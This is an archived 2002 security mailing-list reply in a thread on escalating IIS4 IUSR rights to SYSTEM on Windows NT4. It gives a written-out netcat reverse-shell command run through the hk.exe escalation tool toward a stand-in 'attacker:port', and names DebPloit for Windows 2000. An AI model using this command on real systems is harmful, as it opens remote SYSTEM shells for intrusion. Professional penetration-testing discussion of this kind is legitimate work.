Re: escalating IUSR to admin rights via unicode and iis4

From: Daniel Polombo (polombo@cartel-securite.fr)
Date: Tue Jul 30 2002 - 04:41:19 PDT

Next message: r00tat_private: "Pentesting Cisco 3640 devices via dialup ?"

Previous message: Daniel Polombo: "RE: SQL Injection Legalities"
In reply to: Bill Pennington: "Re: escalating IUSR to admin rights via unicode and iis4"
Next in thread: French, Dave: "RE: escalating IUSR to admin rights via unicode and iis4"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

Le jeu 11/07/2002 à 19:18, Bill Pennington wrote :

> Then just run netcat via hk.exe, connect to the listener, and bingo you 
> are SYSTEM.
> 
> It has been a while since I have done this so I don't recall the exact 
> syntax but that should get you pointed in the right direction.

hk <command>

For instance :

  hk nc -d -e cmd.exe attacker:port

will shovel a shell to attacker:port.

Note that hk only works on NT4 (up to sp6a, meaning that most NT boxes
you'll ever meet should be vulnerable). For win2k, have a look at
DebPloit instead.

--
Daniel Polombo
Consultant
Cartel Sécurité


----------------------------------------------------------------------------
This list is provided by the SecurityFocus Security Intelligence Alert (SIA)
Service. For more information on SecurityFocus' SIA service which
automatically alerts you to the latest security vulnerabilities please see:
https://alerts.securityfocus.com/

Next message: r00tat_private: "Pentesting Cisco 3640 devices via dialup ?"
Previous message: Daniel Polombo: "RE: SQL Injection Legalities"
In reply to: Bill Pennington: "Re: escalating IUSR to admin rights via unicode and iis4"
Next in thread: French, Dave: "RE: escalating IUSR to admin rights via unicode and iis4"
Messages sorted by: [ date ] [ thread ] [ subject ] [ author ]

This archive was generated by hypermail 2b30 : Tue Jul 30 2002 - 07:59:17 PDT